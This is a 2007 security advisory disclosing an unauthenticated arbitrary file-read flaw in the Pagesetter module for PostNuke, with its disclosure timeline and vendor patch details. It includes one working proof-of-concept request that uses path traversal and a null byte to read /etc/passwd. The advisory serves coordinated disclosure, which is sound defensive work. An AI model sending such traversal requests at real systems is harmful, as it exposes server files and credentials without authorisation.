title: File Disclosure in Pagesetter for PostNuke program: Pagesetter page creation module vulnerable version: 6.2.0 6.3.0 beta 5 impact: high homepage: http://www.elfisk.dk found: 2006-11-21 by: D. Matscheko / SEC-CONSULT /
Pagesetter is a publishing module that allows the PostNuke users to create web pages from structured data, with the data structure and output templates defined by the PostNuke administrator.
The 3rd party module Pagesetter - up to its latest version (6.3.0 beta 5) - for PostNuke allows to read arbitrary files. An attacker does not need to be logged in but has to know the filename.
Here is a sample request that reads the file '/etc/passwd':
$ GET 'http://example.com/index.php?module=Pagesetter&type=file&func=preview&id=../../../../../../../../../etc/passwd%00'
Version 6.2.0 as well as 6.3.0 beta 5 are vulnerable to the described attack. No older versions were tested.
vendor notified: 2007-02-08 vendor response: 2007-02-08 patch available: 2007-02-08 coordinated disclosure: 2007-02-26
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Unternehmensberatung GmbH
Office Vienna Blindengasse 3 A-1080 Wien Austria
Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com www.sec-consult.com
EOF David Matscheko / @2007
Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/